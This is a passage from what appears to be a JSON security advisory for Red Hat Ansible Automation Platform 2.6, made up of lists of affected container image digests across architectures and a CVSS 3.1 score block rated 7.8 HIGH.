"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e779c125e7fd9307e117fc7f4e4411f450871417f0447deb68c3821c26cae764_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e8113d25fd42fc3a31dc9bb120764c3b508995c23f73f7e99e0200ac411ad229_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2a24b3e44cd208c8176d4739cf3fc7a19e9fff3b531ab7718de6f5a99db4e4d1_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:47fa330b3fe99501ba7d4b4bb5bc8b5ba0ea7880472070b27250b36fce3d035c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:71a06d4925ea829abc69b3ab518f08844faeaf524bad4c1e6fbc658b8227e0ab_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:fa606a224ac6d3d5e17650a9b9a52e5cb76af57dc767adf79609e0ab95081304_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:08cca1f9a75b0352f17d517f6b7bab53ccf7fba7ef1ff5cedf777c5b68dd15fa_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:381cb54bf157086017cfea6db2a32895b6109640520b4f35f4791b2295c0db29_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:8acf8e32e0dfca8b9a4cfcd765509424a8c1b884ad382a5f21d58e8c44e56cae_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:b46b200558db6b92db270ee3749b8d14b778208ab9ab59e2b7c00dc018d2f3ce_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:30745071ac71a3fdd97d062f180c8fd05d75d9955d4cfccbcf2aeec8deb7f084_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:3ce796ad0c27b82cd6ba0cd946da69e2d62ad392f60dff571a6e826ab17dd8bc_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5c06c479d96b8340382301cb60505f05afcb064d3daf3951df9d8a108b1e4a97_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c0a8ca9591bb9385e2a8773aedbb40f84f4f4f229b0ec1b9bf16c4cedef2f6ad_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:a48db0666b33ef1be5ab4ff02d7584c3fa1516c8a18f09295ae6a220d2e2ebf6_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:b475aea1e95b14a065f76a83e5c8aa74f274955297762808f059ed857cd9cb92_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:bf591d6bc29f3c394b29fd34b0a458cee5c3368130f1aa1e226e49fd112c44fc_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:e7369d9a7242b115b78f7ff72c1a59912fb8304e93220a6faeaf44c25c6b5a71_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:2a12a79a557dd5e32b77eb977c3698ae2191f015121d38689369ae39f22a5f11_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:3b61f49f0dd276d22d67f3e97fb9ffa3382b4a086416f6e59b20ec3e492871cd_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:53432365b9bb22c5df6da741687df208111fcabdea834a3fe9159b0ecf4b73df_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:9e0ca740576e5ddc2af43456f7a8b1dc74e37a4f0734236848b8fae58a0a2e8b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:38f097e4920d4e64c8b8839fcc353f4ff32e607719b5e36f23e208bc70d75b59_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:464caa10ae549dff7824e330f9d5e7e10aacf7b9ee056a6b4aa2768953c94fd8_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:9c7fea42d26e687c017aa573fa13b01ee738c88fe11e55317430e4e8b66d339c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:d0a2f84070918986561679893a78e6da279f7680fb7c00bddcc518974ba1e39c_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:361532ae39672ed922d1e23a09c99cc6f3e596e482c0180d9858346b584c9449_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:8a8db7f1d38de954a4d61f8a98cd91edfe182fcf78750fdaaeb3cf3654897a97_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:96403661397e470423486a3016ea895dc68885d9ba7f855921cda3825d974eb3_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:bf9c237fdc696c54f4263caac1c8784fd77a4a2d55dd59f31dc5008a809cf276_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:03b16022be5e25db2bf45e01526c42b782baba00c0b94175d5598fe65574460e_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:6051f354edc4b2e1143062dd5912d55e90f5db762fca6d7fa8df03bc29b06b0d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:87db0da260805165f54ef956c9e4b1e6a4f6e559306a35558696fb2861422cef_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:e7c8da3d2b7b9c2cfd4240a232b5a388e6ca09927b77b83ca95c66d0270846b0_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:63ccd8ad711852fb955c10b1ee57fd3895e50220ce5f1877e58130a7ff8128a6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:6734e6c33e10a5511392126f447a92c57bfd2ef5f3c3650230a5910e3e20fcf1_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:7576c16f17a67d327a1b275b34c1612ae3811c849ef163eb44a6c6013659382e_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:7dfd8a045a5df672dc2b4f76bff307c0a78c1703e0572f10c1e07bd46e735947_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:08b6f737eed5ee48478db9bfaceb6e9339e2824ecc1973728c697ceae48a488f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:54621aa4ed969de8ec7e3d137178e35ba0fc61c43795e1bd0282c7219bb1d5b0_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:a9c0c6bcdcb061b85074a7e681c6152e7dc64b85571f2cc17001e18f26276ba8_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:da378637b565a2793993a1da503bf13f0c1f135e8cc5c6e569f9ee7c8617023c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:2f9958a2ab37aa25749d5cb9eb9d0dc8bf6b79846963c04f95d09bcc061431e9_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:63abb6f786ed50165351ec2f03649ef0ff5d05e06a939e2314c8b8b4729e803a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:ad9dd51cd467fa3da27d65919644e364baf3c62a7942c9261ea17b72875d7071_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:f5cce04af00f9b56926d067e21e7e252b8d86226f1173f9840ff94d9e8e99d8b_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:3bb5c591fa83d61af4a21f63ab1e044aa56f86a89cbda17b77b98a2a3bb088b9_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:6f03123e4543be01c7f3b592d55db7793a95d1983a1fe8c3ff2ad1c043cc54a4_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:b579af422da0bb4bc6fe17e598ca356e68957b566d9a607ff854ad6039572a56_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:eb6a63704d33b1dcb9eefea57763389c0eeb94c6206e63711c95ac3f0163753c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:5148ead7df13311bd0b39fe2f02f4dc6f11d062598944c9b451a6c8e8b0c45f4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:5f8cfecd3442742b867aeba03ea24009fbd89b31cec0dc02eb02c4d9098dfcec_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:a595b43d0efdd820048fbb9e7a8cefad5d2d20ae0d271fb16b34dd744b95e9eb_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:c1c608e5ee45a6d6248d7657e9b7f17cdb3f8342af9b5e94145217c6fb6efc2a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:71a2f5713323a2d2140d476cb48b66dedeb6f89faf88192dfe40da6c294e2089_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a85326093ec7a9ccde87ea243ad83934707fcef4871fccd934efcba50f355b94_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:af2444728b4c244f8e1b56a0f9d9c9325a1887987f25418833df09947f4ed7e5_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:e1daf0343f7b3e10b7843f85d64bd0ce35612e333597b7c5b48f033b7ec21c89_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:0c3c53caa8ccbea82dfc5dfe795e2e77fc84fd2a485cf0888a095ebe13305363_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:50cee84ad72794144820f6b6d08583387ab4e5f0a6d81ea495430290b173b1ea_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:660235348fa58da3e9a78c757e0cfc5b7f03c5760b9086d2876d87a20888f6a2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:ab5fb18f89334216119c70498585d74c689cdbf8fd21b5826b782d0b5427051f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:1a440c21e1d882875a73201b3135957387f0d7846678b22b52732e984931099a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:50f2bcf49966112665eb82a30e199af6041624e5cdb2372a85075405acf63ab8_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:a4927ab07375561c595afb1898ea52e28a9efb6910bee1011332d23344052e3f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:f69d4d8b4e9ad3666d4fa1aced7a01136f738b49f9c818ee71f7fbd44ff111ec_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:45057e5ae8e5a7bb6646bd7896707859539039e409ac334e8cb3eb99c554e031_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:5565418214a3480ba6e3a85f56838678549e515e374535813dfdc03700950cb7_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:9e97f4cb07e63cc820b988ff3bf7079a087f596341399339f9a94d056ac69301_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:fe1c1dc037cf3e7e690092c761452de7111a899c73512ae9132479f7262139f4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:544021b673fcef3bfe5291e0e82ed387d93735b52c983cd7b8b15779f4676ac1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:d0230cc8ceaa4a82381b566d3661a49567f62c47ec8da11e8c96550e30bcb88f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:d1246fb6fa7ff8221d88c00d73fa59ccfdc09eb3260af45adc8ddf568c5a0398_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:f5c7dd391581c2549b57ea4a5f61133221d19951ac45ff10952bc26048b71975_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:389567d267aab51c7fce52a23439c821995099cec9e37f5962a5dc2114597f84_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:417900ad18144b608fd23c8106aa8824048176eaf5f41eff1af47c43c75b7a89_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:d4c4bb796641f32563ce478b6fc912d1d809b83220a8843cd440ffadb788d17f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:e607ceaa2e3e14859f1ad60b394a1a896c5505662fa17b10f5afd532bda8be9f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:24d7574341fa646e12ca5180a655271b9d947907af80da860b2dab0b51442d12_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:405eeb4b9ece480096d6b4246999ed043c5c2af47006b50677a5f83df870fbe9_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:653fd44dc56da7c4405e458fdcafdc358e323b1d917b97483cf37068da484088_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:77acabaa8cabde7fca8b90fffd651da92eacd54da6eb76933c749656535ef55c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:9683a91e7d16893fe030e1701a2500d1e79c7bea0ab7557438b53d281acd14e4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:9c3bee41f02ed223da8fd3e7a5fc73a67ef82837b947f785a85c6de742c2c75a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:a15644ebe6166a891d02fd672fa1c83242713096d3754a2fd20aa0627ccf45bf_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:a217de550b6a6509eca369318e2bd9585a70c67756ac9980f933b548de668f8d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:184a16150bdf285e1a32a0901871b8fcee6be9529e95de219fd4702d27eeadf0_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:461fc04f1bc051c5ce6ced0e7d7179e9078dd5545eced38bdc37df7a9c06e722_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:64a02cef795fdf08d8b1d5c8bcc96c21c0196360ee3976a4afe5bdae98d3bf77_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:ba3d764e2fcd2d4a8e145a1559bcf9c6daa006c1844ec0f22fecddd18fb39deb_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:33d841d14081ec5f0289e79b6644acb4b5a038f59191493d763d7db4328aeb94_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:7a40a0df543d520528dc35c3fe1c224b298bf24858f29bbedd879f1b23396f55_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:b13680f6f1c058afdca28132b54195532c8cbc0ac634d16591c1a98088933768_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:e037940ea94d2cf16586ec35000a890066860865e992949a28b0a52e18b8b3fa_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:118ad39a5e775943911f5ec803eea0051dc1c720a4b3d3402394e68fa5ca7ca7_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:18f55feaae83ee6506b3af76cdd511687e82995440f87af6e9b9aefa06e726ad_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:644bdbea9feb95628cb142c21d52a2357261a9fd2386ffae978971dd68cad3ec_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:db407b56e08976d1a1014d6248ef3719e3b15dc2171d5281b21a865252c8016a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:0e36aa1324c5cb24a1217dfb477731e386311c29880dc76453756aca4776080a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:16a9f451252541eb555f27528fc547724345767b364d913323077743b84b1b7b_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:787d0e6df45128836d907732ca546d054f10f2fd8708ec6fdbdb2418f9445066_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:d7869fb6e7fce7a1a26841475449f9c7c0b9c29445f5c9c5bd226abfa4ba7f26_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:033fec39621ff64fd83905a4d656ecce7907f7c5531855253a682f414702561d_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:5eaeaaf91e9d13054c54d3060ba8380b42b72d1087612f65baca29c036d593a9_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:9bb6427006e96866392ac8804990b85f9ae7b5f4f1575e7d6123a3ab8d4b365e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:a6ecee20b39158df405c56ed811a882c2ea82a996308b51fad6ac659c669c566_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:62c5e15e425dd562e0a8199e437cdbd2f29e239bd758c25c893ef0a60e767128_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f72a736351733cb24b8243647309abcdf086f0cb8fe59e12a3e95510917dfb4d_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:1e388383c5111049bb8f2d1f37fcee6773067152d256492f7e9db908d52b4652_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:6458f36f24c26733e1a052ce8a1beac8efed6da6574133103d8dc7b868e580b2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:b1561aa0c5cdc34467541dddd7be145859c3d3d041989d483eb54a720a65ec26_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:dbaddb3974c4ca1a4f7e58b0a3d91ba7d2d946100cf55c6acd740a61ad2fb143_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:5049e7dd3ec73b82a0fdc7ba1f5c2ce7bfc4bfee023af24133d1c48eb2838d50_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:7c971a91ac52f6d5e8702548923890afb2aa586731c5092396d3e769516fb7ed_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:c4bc8ce6d217e861df5c0228812c612e9b1c200f3654b26e8bdfd36642b79c57_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:ec267e7bd945593d9bcd3be6201176e5b28376cdd5900d5da8c6f033b0420558_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:97b8905f103277144991667b7953a08fd7a7b2edc448a3d5b5195f1af6802014_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:d7fb722c1e4646d29ee32f5f9a74f7da3c87e07da52a7f28d58017931d375305_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e779c125e7fd9307e117fc7f4e4411f450871417f0447deb68c3821c26cae764_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e8113d25fd42fc3a31dc9bb120764c3b508995c23f73f7e99e0200ac411ad229_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2a24b3e44cd208c8176d4739cf3fc7a19e9fff3b531ab7718de6f5a99db4e4d1_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:47fa330b3fe99501ba7d4b4bb5bc8b5ba0ea7880472070b27250b36fce3d035c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:71a06d4925ea829abc69b3ab518f08844faeaf524bad4c1e6fbc658b8227e0ab_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:fa606a224ac6d3d5e17650a9b9a52e5cb76af57dc767adf79609e0ab95081304_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:08cca1f9a75b0352f17d517f6b7bab53ccf7fba7ef1ff5cedf777c5b68dd15fa_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:381cb54bf157086017cfea6db2a32895b6109640520b4f35f4791b2295c0db29_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:8acf8e32e0dfca8b9a4cfcd765509424a8c1b884ad382a5f21d58e8c44e56cae_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:b46b200558db6b92db270ee3749b8d14b778208ab9ab59e2b7c00dc018d2f3ce_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:30745071ac71a3fdd97d062f180c8fd05d75d9955d4cfccbcf2aeec8deb7f084_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:3ce796ad0c27b82cd6ba0cd946da69e2d62ad392f60dff571a6e826ab17dd8bc_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5c06c479d96b8340382301cb60505f05afcb064d3daf3951df9d8a108b1e4a97_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c0a8ca9591bb9385e2a8773aedbb40f84f4f4f229b0ec1b9bf16c4cedef2f6ad_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:a48db0666b33ef1be5ab4ff02d7584c3fa1516c8a18f09295ae6a220d2e2ebf6_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:b475aea1e95b14a065f76a83e5c8aa74f274955297762808f059ed857cd9cb92_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:bf591d6bc29f3c394b29fd34b0a458cee5c3368130f1aa1e226e49fd112c44fc_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:e7369d9a7242b115b78f7ff72c1a59912fb8304e93220a6faeaf44c25c6b5a71_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:2a12a79a557dd5e32b77eb977c3698ae2191f015121d38689369ae39f22a5f11_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:3b61f49f0dd276d22d67f3e97fb9ffa3382b4a086416f6e59b20ec3e492871cd_arm64",
